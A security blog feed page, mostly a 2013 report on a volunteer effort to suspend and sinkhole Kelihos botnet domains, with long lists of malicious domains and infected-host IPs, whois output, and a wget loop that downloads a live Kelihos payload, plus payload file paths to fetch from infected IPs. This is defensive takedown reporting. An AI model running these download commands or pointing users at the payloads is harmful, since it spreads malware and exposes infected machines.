PropellerAds, Felix Leshno (softologic.com, appround.biz), Adf.ly, AdJuggler, AirSoftware, PerformerSoft, etc

Whether it's those god awful "fake surveys" that you can rarely get through to get the "leet crack", "free iPhone" etc from the skiddies that aren't skilled enough to do anything else, or the ad networks that keep allowing companies such as PerformerSoft, or file hosting and redirection sites such as Adf.ly, LinkBucks, FileSwap, Mediafire etc etc etc, we keep seeing a plethora of blatantly

Read More

FYI folks

Just an FYI folks, I'm having a few issues with my primary machine at present, so if you've sent me an email over the past couple of weeks, please rest assured, I will get to it as soon as I can (please feel free to re-send it).

I've also fixed at least once issue with the hphosts-partial.asp file. I'm aware of an issue still affecting HostsMan users, and am awaiting a reply from a friend (

Read More

The result on 48hours+ in battle with Kelihos < request for FURTHER block/dismantle cooperation & support. #Tango is going down..

This post is dedicated to many.. so many of wonderful individuals involved with the effort to stand against Kelihos P2P malware infection. This is an example on WHAT CAN BE DONE if InfoSec are gathered to fight malware infection. This report is totally an effort of a team contains members who simply believe the same dream, to free our internet from malware. We cannot make a list of your (so many) names but we are all know who you are and what you did. Sincerely respect with thank you very much. There were many bumpy communication was initially made, for the tense and rogue communication we apology to every inconveniences. I personally am so happy to live in an era of gentlemen like you are! #MalwareMustDie!

First, you need to know what the Kelihos Botnet & malware threat is, our previous post gives you good illustration about the threat here-->>[Previous Post]. As per you maybe noticed in the our twitter timeline, we are doing our best effort in battle with the Kelihos malware scum, yes we were haunted by this infection via RedKit Exploit Kits, TDSS, direct spam or via its botnet self-updating function itself and this "scum" still out there and feeling happy-ever-after infecting us, we just can not accept this fact.

Therefore we executed every possible effort that can be done as a bunch of volunteers of an NPO entity to suppress their growth in internet. As the efforts itself is varied from suspension, sinkhole, DNSBL block, VT/URLQuery (+etc) blacklisting, OpenDNS/GoogleDNS blocking, parallel with bunch of reports to the regional basis authorities (CERTs, GroupIB, ISPs, Registrar, ICANN, Microsoft) and to varied Sinkhole entities.

We recieved the great help and support from the people in the entities mentioned above, and also with a perfect work delegation between our team in twitter so we are able to gain a good fight and successfully resulted some good achivements within 48hours+. It is unfair to let people who help and support us by seeing only twitter as result that's why I posted our effort's report here, together with some tips and tricks used in fighting this infection in our beloved MalwareMustDie blog.

And this post is the report of the mentioned effort. Here we go..

1. Stopping the new Kelihos NS based .COM services

By the time we started this effort, Kelihos started to switch their DNS from something with ns[1-6]."\][a-z]\{7\,8\}\.".RU into the .COM tld domains with the format ns[1-6]."\][a-z]\{7\}\.".COM , we found that all of the domains was released by INTERNET.BS a well-known registrar of being abused by the cybercrime to release their infector domains. And with the great help from the very dedicated individuals mentioned above we took these domains (see below) off internet:

DUSSEVA.COM
BEUHNIM.COM
GULFKAT.COM
ZUNCHER.COM
FLOWSRE.COM
OMBUGEW.COM
WIDERAT.COM
DAVUJUZ.COM
XEXUMYB.COM
KAROZGI.COM
OSIKKID.COM
NIGUCGU.COM

below is the PoC of the suspension and sinkholing result:

This is how they got into internet:

#MalwareMustDie! Bahama registrar @internetbs was proven releasing #Kelihos 12(twelve) .COMs in past 2mnth as main NS infector! #PlsHelpRT

— MalwareMustDie, NPO (@MalwareMustDie) August 8, 2013

The following is some of PoC and hard evidence of the .COM that Kelihos used are in the extracted INTERNET.BS released domains database-->>[PASTEBIN]

2. The dismantling effort of .RU infectors

Currently, the main basis of the Kelihos infecion are using the .RU basis ccTLD domain. It is very important to suppress their growth in their home-base also. With the great coordination and help fro GroupIB we made effort to dismantle the other "NEW" 101 .RU "weaponized domains as per listed below:

Date: Thu Aug  8 19:54:43 JST 2013

ABJIQFIR.RU,, ns[1-6].karozgi.com
ACXYPZUK.RU,, ns[1-6].karozgi.com
AFEBIRYN.RU,, ns[1-6].karozgi.com
ANGENJEJ.RU,, ns[1-6].karozgi.com
BADMYVOK.RU,, ns[1-6].karozgi.com
BEZGESUK.RU,, ns[1-6].karozgi.com
BITITROJ.RU,, ns[1-6].karozgi.com
BOVEWHAV.RU,, ns[1-6].karozgi.com
BOWRETTI.RU,, ns[1-6].karozgi.com
CICDIWYH.RU,, ns[1-6].karozgi.com
COLYDQEC.RU,, ns[1-6].karozgi.com
CYVWYDJE.RU,, ns[1-6].karozgi.com
DAHADKYZ.RU,, ns[1-6].karozgi.com
DEPCOPUQ.RU,, ns[1-6].karozgi.com
DEQYPPIL.RU,, ns[1-6].karozgi.com
DIICUHXA.RU,, ns[1-6].karozgi.com
EJOPOWOZ.RU,, ns[1-6].karozgi.com
EJQIURMY.RU,, ns[1-6].karozgi.com
FITUZVOF.RU,, ns[1-6].karozgi.com
FOJEGGUF.RU,, ns[1-6].karozgi.com
GAJKUKUC.RU,, ns[1-6].karozgi.com
GECAKCEM.RU,, ns[1-6].karozgi.com
GYCBOKUD.RU,, ns[1-6].karozgi.com
HURVINEV.RU,, ns[1-6].karozgi.com
HUZNEJEX.RU,, ns[1-6].karozgi.com
HYNEQREL.RU,, ns[1-6].karozgi.com
IMKYHTUG.RU,, ns[1-6].karozgi.com
IPXYJYOQ.RU,, ns[1-6].karozgi.com
ITWILMEP.RU,, ns[1-6].karozgi.com
IWKYXSEZ.RU,, ns[1-6].karozgi.com
IXMUTIRI.RU,, ns[1-6].karozgi.com
JAHKUXYV.RU,, ns[1-6].karozgi.com
JEFDYWSO.RU,, ns[1-6].karozgi.com
JIQLIDOX.RU,, ns[1-6].karozgi.com
JOKLASAN.RU,, ns[1-6].karozgi.com
KAPKICOH.RU,, ns[1-6].karozgi.com
KEBWAKQY.RU,, ns[1-6].karozgi.com
KICSIHOP.RU,, ns[1-6].karozgi.com
KIZCIVZE.RU,, ns[1-6].karozgi.com
KUBGYBOH.RU,, ns[1-6].karozgi.com
KYCROTUS.RU,, ns[1-6].karozgi.com
LICLAJLE.RU,, ns[1-6].karozgi.com
LIMJOZEH.RU,, ns[1-6].karozgi.com
LIZECGIJ.RU,, ns[1-6].karozgi.com
LUFRUDET.RU,, ns[1-6].karozgi.com
LUPQUXSE.RU,, ns[1-6].karozgi.com
LYOHGEOF.RU,, ns[1-6].karozgi.com
MAPUHXAF.RU,, ns[1-6].karozgi.com
MOHGOXEB.RU,, ns[1-6].karozgi.com
MYBFABWI.RU,, ns[1-6].karozgi.com
NECUWFEW.RU,, ns[1-6].karozgi.com
NENKUDYF.RU,, ns[1-6].karozgi.com
NICLYCOM.RU,, ns[1-6].karozgi.com
NOJQAVYJ.RU,, ns[1-6].karozgi.com
NORWOLLU.RU,, ns[1-6].karozgi.com
NUKUNNOQ.RU,, ns[1-6].karozgi.com
ONSUGNEM.RU,, ns[1-6].karozgi.com
ORNEVKYC.RU,, ns[1-6].karozgi.com
PEXDAJYP.RU,, ns[1-6].karozgi.com
PIVGEVIT.RU,, ns[1-6].karozgi.com
PIYMNYFA.RU,, ns[1-6].karozgi.com
POWERWIK.RU,, ns[1-6].karozgi.com
PUPUXHEF.RU,, ns[1-6].karozgi.com
PYDAJZYK.RU,, ns[1-6].karozgi.com
QABADPIX.RU,, ns[1-6].karozgi.com
QOFHIRAW.RU,, ns[1-6].karozgi.com
QYSQUWKO.RU,, ns[1-6].karozgi.com
RIFAUTIR.RU,, ns[1-6].karozgi.com
RIZIKCUG.RU,, ns[1-6].karozgi.com
ROVSYMWO.RU,, ns[1-6].karozgi.com
RYTEOPBY.RU,, ns[1-6].karozgi.com
SAWSOBCY.RU,, ns[1-6].karozgi.com
SOMOXBET.RU,, ns[1-6].karozgi.com
TAFIBCUM.RU,, ns[1-6].karozgi.com
TAZGYVAX.RU,, ns[1-6].karozgi.com
TITGOQTE.RU,, ns[1-6].karozgi.com
TYZFOWFE.RU,, ns[1-6].karozgi.com
UWPAYTNU.RU,, ns[1-6].karozgi.com
VEFLOHGY.RU,, ns[1-6].karozgi.com
VEKDEGYL.RU,, ns[1-6].karozgi.com
VUZNIQIK.RU,, ns[1-6].karozgi.com
VYFUXTIS.RU,, ns[1-6].karozgi.com
WANZAWBY.RU,, ns[1-6].karozgi.com
WODYFWOD.RU,, ns[1-6].karozgi.com
WORLIPXO.RU,, ns[1-6].karozgi.com
XAKRYXOG.RU,, ns[1-6].karozgi.com
XIMIRSEX.RU,, ns[1-6].karozgi.com
XIMXAMLI.RU,, ns[1-6].karozgi.com
XUGNEMYQ.RU,, ns[1-6].karozgi.com
YFKYTXIX.RU,, ns[1-6].karozgi.com
YFXIGUSO.RU,, ns[1-6].karozgi.com
YGXEYVXI.RU,, ns[1-6].karozgi.com
YJSEYGFY.RU,, ns[1-6].karozgi.com
YWHYIWDY.RU,, ns[1-6].karozgi.com
ZADNAZVO.RU,, ns[1-6].karozgi.com
ZUNCUHAK.RU,, ns[1-6].karozgi.com
ZUVNENAX.RU,, ns[1-6].karozgi.com
ZUZVAQAW.RU,, ns[1-6].karozgi.com
ZYHIJWIN.RU,, ns[1-6].karozgi.com
ZYRTYDAJ.RU,, ns[1-6].karozgi.com

From the status of weaponized by Kelihos to infect as per recorded HLUX's A records in here:

Date: Fri, 2 Aug 2013 11:43:40 -0700 (PDT)

ABJIQFIR.RU,188.209.251.38,
ACXYPZUK.RU,109.89.137.178,
AFEBIRYN.RU,,
ANGENJEJ.RU,,
BADMYVOK.RU,77.122.196.95,
BEZGESUK.RU,77.122.139.203,
BITITROJ.RU,109.191.82.32,
BOVEWHAV.RU,93.79.91.188,
BOWRETTI.RU,,
CICDIWYH.RU,89.229.196.228,
COLYDQEC.RU,46.56.67.7,
CYVWYDJE.RU,190.220.70.5,
DAHADKYZ.RU,178.75.46.67,
DEPCOPUQ.RU,89.149.105.201,
DEQYPPIL.RU,109.87.198.110,
DIICUHXA.RU,95.111.205.207,
EJOPOWOZ.RU,79.112.214.164,
EJQIURMY.RU,188.129.240.79,
FITUZVOF.RU,37.229.99.95,
FOJEGGUF.RU,,
GAJKUKUC.RU,176.37.121.102,
GECAKCEM.RU,77.122.191.111,
GYCBOKUD.RU,176.8.231.155,
HURVINEV.RU,46.237.110.5,
HUZNEJEX.RU,95.65.80.117,
HYNEQREL.RU,94.76.110.237,
IMKYHTUG.RU,37.252.67.195,
IPXYJYOQ.RU,93.79.231.55,
ITWILMEP.RU,,
IWKYXSEZ.RU,178.218.66.19,
IXMUTIRI.RU,109.207.113.126,
JAHKUXYV.RU,46.185.24.210,
JEFDYWSO.RU,93.125.45.196,
JIQLIDOX.RU,109.201.107.204,
JOKLASAN.RU,88.206.28.89,
KAPKICOH.RU,109.207.118.98,
KEBWAKQY.RU,109.251.94.117,
KICSIHOP.RU,77.120.229.169,
KIZCIVZE.RU,86.101.22.28,
KUBGYBOH.RU,77.122.217.253,
KYCROTUS.RU,94.253.45.147,
LICLAJLE.RU,46.33.55.77,
LIMJOZEH.RU,93.126.126.71,
LIZECGIJ.RU,,
LUFRUDET.RU,159.224.76.42,
LUPQUXSE.RU,37.115.91.192,
LYOHGEOF.RU,109.87.162.4,
MAPUHXAF.RU,37.46.226.241,
MOHGOXEB.RU,194.28.4.29,
MYBFABWI.RU,27.49.104.107,
NECUWFEW.RU,94.231.181.24,
NENKUDYF.RU,178.165.23.171,
NICLYCOM.RU,,
NOJQAVYJ.RU,98.193.167.182,
NORWOLLU.RU,178.137.203.149,
NUKUNNOQ.RU,24.49.38.150,
ONSUGNEM.RU,77.85.201.46,
ORNEVKYC.RU,219.70.195.200,
PEXDAJYP.RU,31.128.186.43,
PIVGEVIT.RU,,
PIYMNYFA.RU,46.173.112.16,
POWERWIK.RU,94.244.129.195,
PUPUXHEF.RU,176.8.38.115,
PYDAJZYK.RU,2.68.213.50,
QABADPIX.RU,46.211.63.25,
QOFHIRAW.RU,176.37.121.102,
QYSQUWKO.RU,178.137.72.42,
RIFAUTIR.RU,213.111.69.126,
RIZIKCUG.RU,,
ROVSYMWO.RU,,
RYTEOPBY.RU,89.146.79.57,
SAWSOBCY.RU,,
SOMOXBET.RU,121.129.93.208,
TAFIBCUM.RU,109.87.7.53,
TAZGYVAX.RU,180.110.156.205,
TITGOQTE.RU,189.199.182.2,
TYZFOWFE.RU,,
UWPAYTNU.RU,77.122.227.41,
VEFLOHGY.RU,,
VEKDEGYL.RU,46.173.77.173,
VUZNIQIK.RU,94.230.192.50,
VYFUXTIS.RU,151.0.27.230,
WANZAWBY.RU,212.142.96.18,
WODYFWOD.RU,77.85.201.46,
WORLIPXO.RU,77.121.79.14,
XAKRYXOG.RU,118.160.103.152,
XIMIRSEX.RU,220.137.79.242,
XIMXAMLI.RU,195.24.155.245,
XUGNEMYQ.RU,77.120.179.237,
YFKYTXIX.RU,46.211.85
YFXIGUSO.RU,195.24.155.245,
YGXEYVXI.RU,178.211.139.155,
YJSEYGFY.RU,,
YWHYIWDY.RU,123.236.68.229,
ZADNAZVO.RU,27.6.9.213,
ZUNCUHAK.RU,,
ZUVNENAX.RU,119.14.86.100,
ZUZVAQAW.RU,123.241.73.225,
ZYHIJWIN.RU,178.151.24.58,
ZYRTYDAJ.RU,31.42.119.142,

And currently in blocking effort with OpenDNS & sinkhole the below RU domains:

EJWOPWYZ.RU,188.27.168.54, ns[1-6].osikkid.com
EKREDTEF.RU,, ns[1-6].osikkid.com
EQGYQTAD.RU,46.250.23.59, ns[1-6].osikkid.com
EVLYLTUX.RU,94.154.224.58, ns[1-6].osikkid.com
FIBLOQAF.RU,, ns[1-6].osikkid.com
FINQIMIG.RU,, ns[1-6].osikkid.com
FOHKYQUW.RU,92.113.255.98, ns[1-6].osikkid.com
FOWAJKUG.RU,, ns[1-6].osikkid.com
FYBYNKEQ.RU,, ns[1-6].osikkid.com
FYDIWGAZ.RU,, ns[1-6].osikkid.com
FYGJUGLI.RU,180.176.172.93, ns[1-6].osikkid.com
FYJTIHOX.RU,, ns[1-6].osikkid.com
FYTUCTOX.RU,, ns[1-6].osikkid.com
GEGDYRAG.RU,, ns[1-6].osikkid.com
GEGMULAD.RU,36.229.82.210, ns[1-6].osikkid.com
GENUVBIZ.RU,, ns[1-6].osikkid.com
GIZROSCA.RU,, ns[1-6].osikkid.com
GUQIDRUV.RU,91.224.168.65, ns[1-6].osikkid.com
HAMOVLOX.RU,, ns[1-6].osikkid.com
HAZLYDUW.RU,85.198.179.73, ns[1-6].osikkid.com
HIHFELGO.RU,, ns[1-6].osikkid.com
HIILOSAB.RU,111.251.91.74, ns[1-6].osikkid.com
HIKKINUF.RU,, ns[1-6].osikkid.com
HOKKINYF.RU,62.231.183.49, ns[1-6].osikkid.com
IVKEUHUW.RU,178.150.244.54, ns[1-6].osikkid.com
IXCUPDAM.RU,124.123.169.123, ns[1-6].osikkid.com
JIBDEFUP.RU,, ns[1-6].osikkid.com
JIXUDRER.RU,, ns[1-6].osikkid.com
JUQUTSAF.RU,112.139.167.48, ns[1-6].osikkid.com
JURLYQYR.RU,129.15.40.86, ns[1-6].osikkid.com
JUVBEBEC.RU,, ns[1-6].osikkid.com
JYHVYCLI.RU,, ns[1-6].osikkid.com
JYSHIWIK.RU,, ns[1-6].osikkid.com
KANRUQYC.RU,, ns[1-6].osikkid.com
KEJIKKIB.RU,77.52.104.119, ns[1-6].osikkid.com
LAWNUPAS.RU,, ns[1-6].osikkid.com
LENEVRYP.RU,, ns[1-6].osikkid.com
LIFNAGCI.RU,, ns[1-6].osikkid.com
LILXAJTE.RU,, ns[1-6].osikkid.com
MEDULZAL.RU,, ns[1-6].osikkid.com
MOJJIQUF.RU,, ns[1-6].osikkid.com
MUBYBLAZ.RU,, ns[1-6].osikkid.com
NADKEWLO.RU,, ns[1-6].osikkid.com
NEQAJDAC.RU,, ns[1-6].osikkid.com
NUJOJPAL.RU,, ns[1-6].osikkid.com
PABOBBAH.RU,, ns[1-6].osikkid.com
PELVOJEL.RU,, ns[1-6].osikkid.com
PEQINNIR.RU,, ns[1-6].osikkid.com
PIGOVFIJ.RU,, ns[1-6].osikkid.com
PYMSILIQ.RU,, ns[1-6].osikkid.com
QAQIQGOD.RU,, ns[1-6].osikkid.com
QEGYRDAD.RU,, ns[1-6].osikkid.com
QEHWOCSI.RU,115.241.91.53, ns[1-6].osikkid.com
RALYMEBU.RU,77.198.70.248, ns[1-6].osikkid.com
RAWPENEP.RU,114.38.44.145, ns[1-6].osikkid.com
RAZCAMIT.RU,37.112.160.119, ns[1-6].osikkid.com
RETUCWYX.RU,, ns[1-6].osikkid.com
RIHSYCVO.RU,213.111.155.5, ns[1-6].osikkid.com
RIZOMCOF.RU,178.74.237.85, ns[1-6].osikkid.com
RYCNISAV.RU,, ns[1-6].osikkid.com
RYGXUQYF.RU,, ns[1-6].osikkid.com
SECZYPRY.RU,46.162.9.40, ns[1-6].osikkid.com
SEPOILOK.RU,, ns[1-6].osikkid.com
SIPVAQBE.RU,188.242.51.78, ns[1-6].osikkid.com
SOKXENBY.RU,37.221.142.107, ns[1-6].osikkid.com
TERUJBIH.RU,, ns[1-6].osikkid.com
TYVWUQAL.RU,, ns[1-6].osikkid.com
UDPYCBEL.RU,, ns[1-6].osikkid.com
UHHUWTEG.RU,, ns[1-6].osikkid.com
UJDOGVIC.RU,, ns[1-6].osikkid.com
UQEBENEW.RU,, ns[1-6].osikkid.com
VESYKVEL.RU,193.107.102.209, ns[1-6].osikkid.com
VUVSIMXO.RU,, ns[1-6].osikkid.com
WYMCEKIN.RU,, ns[1-6].osikkid.com
XUBQOBOH.RU,, ns[1-6].osikkid.com
XUVGYSCI.RU,, ns[1-6].osikkid.com
XYBYHCYZ.RU,, ns[1-6].osikkid.com
XYTFYRSU.RU,, ns[1-6].osikkid.com
ZAGTYCAM.RU,, ns[1-6].osikkid.com
ZEVIJAEF.RU,, ns[1-6].osikkid.com
ZUCFIZME.RU,, ns[1-6].osikkid.com
ZUQTIZYH.RU,, ns[1-6].osikkid.com
ZYCPOHDU.RU,, ns[1-6].osikkid.com
ZYVMYSXA.RU,1.168.215.194, ns[1-6].osikkid.com

Belos is the official information received from GroupIB for SUSPENSION of 100 another domains Kelihos we reported, which was swiftly followed in less than 48 hours! :-)

Dear Partners,

Group-IB CERT (CERT-GIB) has suspended the following domains:

 acbimnik.ru
 ajwablet.ru
 albodlyc.ru
 aqxiwtil.ru
 avdicsuw.ru
 awpavdog.ru
 bevywcoc.ru
 bezekqen.ru
 bivozhij.ru
 cahmydjo.ru
 cyjukpym.ru
 cyknewyh.ru
 cyqsuxon.ru
 diijgyan.ru
 dyotukci.ru
 dyradleq.ru
 ejwopwyz.ru
 ekredtef.ru
 eqgyqtad.ru
 evlyltux.ru
 fibloqaf.ru
 finqimig.ru
 fohkyquw.ru
 fowajkug.ru
 fybynkeq.ru
 fydiwgaz.ru
 fygjugli.ru
 fyjtihox.ru
 fytuctox.ru
 gegdyrag.ru
 gegmulad.ru
 genuvbiz.ru
 gizrosca.ru
 guqidruv.ru
 hamovlox.ru
 hazlyduw.ru
 hihfelgo.ru
 hiilosab.ru
 hikkinuf.ru
 hokkinyf.ru
 ivkeuhuw.ru
 ixcupdam.ru
 jibdefup.ru
 jixudrer.ru
 juqutsaf.ru
 jurlyqyr.ru
 juvbebec.ru
 jyhvycli.ru
 jyshiwik.ru
 kanruqyc.ru
 kejikkib.ru
 lawnupas.ru
 lenevryp.ru
 lifnagci.ru
 lilxajte.ru
 medulzal.ru
 mojjiquf.ru
 mubyblaz.ru
 nadkewlo.ru
 neqajdac.ru
 nujojpal.ru
 pabobbah.ru
 pelvojel.ru
 peqinnir.ru
 pigovfij.ru
 pymsiliq.ru
 qaqiqgod.ru
 qegyrdad.ru
 qehwocsi.ru
 ralymebu.ru
 rawpenep.ru
 razcamit.ru
 retucwyx.ru
 rihsycvo.ru
 rizomcof.ru
 rycnisav.ru
 rygxuqyf.ru
 seczypry.ru
 sepoilok.ru
 sipvaqbe.ru
 sokxenby.ru
 terujbih.ru
 tyvwuqal.ru
 udpycbel.ru
 uhhuwteg.ru
 ujdogvic.ru
 uqebenew.ru
 vesykvel.ru
 vuvsimxo.ru
 wymcekin.ru
 xubqoboh.ru
 xuvgysci.ru
 xybyhcyz.ru
 xytfyrsu.ru
 zagtycam.ru
 zevijaef.ru
 zucfizme.ru
 zuqtizyh.ru
 zycpohdu.ru
 zyvmysxa.ru

3. How we PoC an NS infector in commercial TLD

This is how we always PoC the new infector in the wild, we share this as a know how for everyone to help to be able to spot and report the new infection, we use our PoC for OSIKKID.COM as per below:

'(1) Spreads the HLUX as per below checks:'

bash-3.2$ date
Thu Aug  8 12:57:18 JST 2013

// the HLUX IP..

bash-3.2$ while true; do dig +short OSIKKID.COM; sleep 1; done
119.14.28.104
218.166.2.199
125.215.84.135
77.123.42.134
183.72.199.4
36.234.222.167
114.38.198.134
117.197.230.88
95.30.210.87
160.75.9.240
46.250.101.113
175.111.40.232
46.250.99.105
[...]

'(2) Serving Payload malware of Kelihos'
and every A records is serving Kelihos payload:
// Below is the currently download PoC:

bash-3.2$ while true; do wget h00p://OSIKKID.COM/rasta01.exe; sleep 1; done
--2013-08-08 12:59:14--  h00p://osikkid.com/rasta01.exe
Resolving osikkid.com... 89.136.131.41
Connecting to osikkid.com|89.136.131.41|:80... connected.
HTTP request sent, awaiting response... 200 
Length: 1221261 (1.2M) []
Saving to: ‘rasta01.exe’
100%
Last-modified header invalid -- time-stamp ignored.
2013-08-08 12:59:22 (260 KB/s) - ‘rasta01.exe’ saved [1221261/1221261]

--2013-08-08 12:59:42--  h00p://osikkid.com/rasta01.exe
Resolving osikkid.com... 124.111.249.204
Connecting to osikkid.com|124.111.249.204|:80... connected.
HTTP request sent, awaiting response... ç200 
Length: 1221261 (1.2M) []
Saving to: ‘rasta01.exe.2’
Last-modified header invalid -- time-stamp ignored.
2013-08-08 12:59:53 (1003 KB/s) - ‘rasta01.exe.2’ saved [1221261/1221261]
  [...]

'(3) INTERNET.BS registration is current MO.'
It is proven behind the registration process of this domains
We tried to remotely extracted the registrar: INTERNET.BS released 
domain from current day until Jun the 1st, and this domain is one of it:

bash-3.2$ whois osikkid.com
Whois Server Version 2.0
Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.
   Domain Name: OSIKKID.COM
   Registrar: INTERNET.BS CORP.
   Whois Server: whois.internet.bs
   Referral URL: http://www.internet.bs
   Name Server: NS1.OSIKKID.COM
   Name Server: NS2.OSIKKID.COM
   Name Server: NS3.OSIKKID.COM
   Name Server: NS4.OSIKKID.COM
   Name Server: NS5.OSIKKID.COM
   Name Server: NS6.OSIKKID.COM
   Status: clientTransferProhibited
   Updated Date: 06-aug-2013
   Creation Date: 18-jun-2013
   Expiration Date: 18-jun-2014
>>> Last update of whois database: Thu, 08 Aug 2013 04:03:30 UTC <<<

'(4) The linked DNS services used with the previous Kelihos reported NS services:'

The NS1. of this domains is linked with the same NS as previous reported:
ns1.OSIKKID.COM = ns3.davujuz.com
ns2.OSIKKID.COM = ns5.ns4, ns2.ns4.ombugew.com
ns3.OSIKKID.COM = ns1.davujuz.com
...and so on...

'(5) The infection raised in RU are causing by OSIKKD.COM NS server:'
The 100 domains RU are needed to be blocked with the same pattern as we previously reported to Group IB, under REGGI.RU, (and FYI the abuse of the RU by the kelihos is more than 12,000 domains not included this one... )
This is the PoC that the domains of RU was registered 24hrs more under the OSIKKD.COM NS :
domain:        ACBIMNIK.RU
nserver:       ns1.osikkid.com.
nserver:       ns2.osikkid.com.
nserver:       ns3.osikkid.com.
nserver:       ns4.osikkid.com.
nserver:       ns5.osikkid.com.
nserver:       ns6.osikkid.com.
state:         REGISTERED, DELEGATED, UNVERIFIED
person:        Private Person
registrar:     REGGI-REG-RIPN
admin-contact: https://panel.reggi.ru/user/whois/webmail/
created:       2013.08.06
paid-till:     2014.08.06
free-date:     2014.09.06

Below is the check of the reported RU affiliated by the NS of the OSIKKID.COM crossed by the IP and DNS:

ACBIMNIK.RU,,      ns1.osikkid.com.
      ns2.osikkid.com.
      ns3.osikkid.com.
      ns4.osikkid.com.
      ns5.osikkid.com.
      ns6.osikkid.com.
AJWABLET.RU,123.240.108.221,      ns1.osikkid.com.
      ns2.osikkid.com.
      ns3.osikkid.com.
      ns4.osikkid.com.
      ns5.osikkid.com.
      ns6.osikkid.com.
ALBODLYC.RU,,      ns1.osikkid.com.
      ns2.osikkid.com.
      ns3.osikkid.com.
      ns4.osikkid.com.
      ns5.osikkid.com.
      ns6.osikkid.com.
[...]

4. Monitoring The Actual Infection Range

As per today before the NS sinkholing on effect, with the great effort of our members we monitor the infection of the 1,287 IP address actively distributing Kelihos malware payload all over the world as per listed in our pastebin here-->>[LINK]

You can add the /rasta01.exe after the IP to get the latest Kelihos sample payload for your research purpose, as per below sample:

The below binary files also can be used for the same monitoring purpose:

/keybex4.exe
/bljat01.exe
/cuper01.exe
/rasta01.exe
/calc.exe

These infection is plotted in the good graphical interface by Chris J Wilson as per below:

Infection based per ASN:

Infection based by country:

Prologue

The effort is not stopping now.. see below:

#MalwareMustDie! The #Kelihos scums JUST register NEW domain NIGUCGU,COM <via @internetbs TODAY! #BLOCK & #Tango this pic.twitter.com/zCwiPyb8W4

— MalwareMustDie, NPO (@MalwareMustDie) August 8, 2013

And what a FAST action from our friends!! See the time stamp in the tweets, it is AMAZING to suspend & sinkhole malware domains THAT fast! :-)) (you guys rocks!!)

#MalwareMustDie! Thank's for helps! NIGUCGU,COM is SUSPENDED + in SINKHOLE now! Let's hear #Kelihos scum CRY harder! pic.twitter.com/KKIgkRaLav

— MalwareMustDie, NPO (@MalwareMustDie) August 8, 2013

We work hard on trying to break this "Kelihos" legend methodologically and the method works!
Don't ever let the Kelihos scums enter the internet! Spot & stop them instantly, cooperate with the abused registrar to get the new infectors go to sinkholes and to suspend those new domains instantly.
They weakness is in their DNS, these services backboned their payload distribions of thousands IP and infector domains. And those DNS are using static addresses of un-removeable machines. This IS a target to be shutdown!
Thus, DO NOT let those NS getting any domains in our internet! Is not easy to shift their DNS, it hurts them very bad, they just change the name server domains time after time. And right now they need to have a non-RU domains for their DNS to survive their botnet longer.
Let's build the procedure to SPOT, BLOCK, SUSPEND & CLEAN-UP in one flow altogether!
We need your help, your support in coordination with Kelihos botnet's suppress effort. Please cooperate!

Recent Updates

#MalwareMustDie! #WARNING #KELIHOS NEW DOMAIN: OFCIWOX,COM http://t.co/YtKlsk6yFe <NEW Registrar: PDR LTD./ DOMALAND pic.twitter.com/Awa4k8g5Wu

— MalwareMustDie, NPO (@MalwareMustDie) August 9, 2013

#MalwareMustDie! Kelihos is using Registrar: PDR LTD. D/B/A http://t.co/yc1mHo1akL now with/RegDB: DOMALAND <#Monitor pic.twitter.com/klLEuFrSFv

— MalwareMustDie, NPO (@MalwareMustDie) August 9, 2013

#MalwareMustDie! Now "finally" we see the #Kelihos botnet IP in US (pic) http://t.co/cZZRisjXzp < better check.. pic.twitter.com/VOTy4JZfVH

— MalwareMustDie, NPO (@MalwareMustDie) August 9, 2013

#MalwareMustDie! Additional 8 NEW of #KELIHOS .COM was followed. Thank's @VriesHd & @DhiaLite , Copy of email report: http://t.co/FVGjjIzTSM

— MalwareMustDie, NPO (@MalwareMustDie) August 9, 2013

#MalwareMustDie! Gentlemen, Today's #Kelihos IP in breakdown details: http://t.co/3jtls5i45X < grep your CN, grep the network & spread this!

— MalwareMustDie, NPO (@MalwareMustDie) August 9, 2013

#MalwareMustDie! Summary of the Kelihos fighting today: http://t.co/3Y4LUpjscA Thank's: @abuse_ch @opendns @GroupIB @DhiaLite @VriesHd

— MalwareMustDie, NPO (@MalwareMustDie) August 10, 2013

And even registrar also cooperated beforehand w.o waiting sinkhole :-) Thank you!

#MalwareMustDie! Great #ACT of @abuse_ch to SINKHOLE freshly spotted #Kelihos .COMs (pic) /c: @DhiaLite @VriesHd @ALL pic.twitter.com/HebriR5XMU

— MalwareMustDie, NPO (@MalwareMustDie) August 10, 2013

Our friend, Chris J Wilson was making great statistic of the latest infection data:

Country base infection data:

AS Number base infection data:

#MalwareMustDie #Kelihos .COM current sinkhole status (pic) @VriesHd @DhiaLite @ConradLongmore @abuse_ch pic.twitter.com/sUw8VVcyTq

— MalwareMustDie, NPO (@MalwareMustDie) August 11, 2013

#MalwareMustDie! Kelihos botnet IP milked today http://t.co/Bf4sn2qTw1 < please help to contact & clean up your CN/network from infection!

— MalwareMustDie, NPO (@MalwareMustDie) August 11, 2013

#MalwareMustDie! Here is the latest our official report on #Kelihos operation today: http://t.co/OGbw5rGkl3 THANK'S FOR YOUR HELP!! < ALL!

— MalwareMustDie, NPO (@MalwareMustDie) August 12, 2013

#MalwareMustDie! Current #Kelihos block list (pic) pic.twitter.com/xEOW6SRLXA

— MalwareMustDie, NPO (@MalwareMustDie) August 12, 2013

Terrific world map of infection by chris J Wilson:

Graph URL is here-->>[LINK]

After .COM the Kelihos moronz shifts to .ME, .ORG & .INFO
Is an idiotic and pathetic act, they don't know with whom they are dealing with now..

#MalwareMustDie!

Read More

hpHosts: Updated 07-08-2013

The hpHOSTS Hosts file has been updated. There is now a total of 218,563 listed hostsnames.If you are NOT using the installer, please read the included Readme.txt file for installation instructions. Enjoy! :)Latest Updated: 07/08/2013 16:19Last Verified: 04/08/2013 12:00Download hpHosts now!http://hosts-file.net/?s=Download

Read More

"You hacked.. We cracked & You're doomed!" - An IR adventure of an abused "WP Super Cache" plugin for Exploit Kit (Glazunov) infection

"I dedicated this post to our members on visit to BlackHat & Def Con 2013, who's helping to present our group in the security community, with deeply regret that I could not make it to go there, no matter how bad I would like to.
Thank you to @hugbomb, @set_abimone and @kafeine for the help in the spotting redirection, EK confirmation and flushing samples, to @hFireF0X and other Kernel Mode members for helping figuring & quick mitigating the new version of Zero Access spotted in this threat!"

Background

I was mentioned about an infection by our team's @hugbomb:

@MalwareMustDie FYI http://xxxx. net/ is infected, your neck of the woods..

— hugbomb (@hugbomb) July 28, 2013

I cleaned the site within 24hrs, after releasing my neck of the woods.. :-)
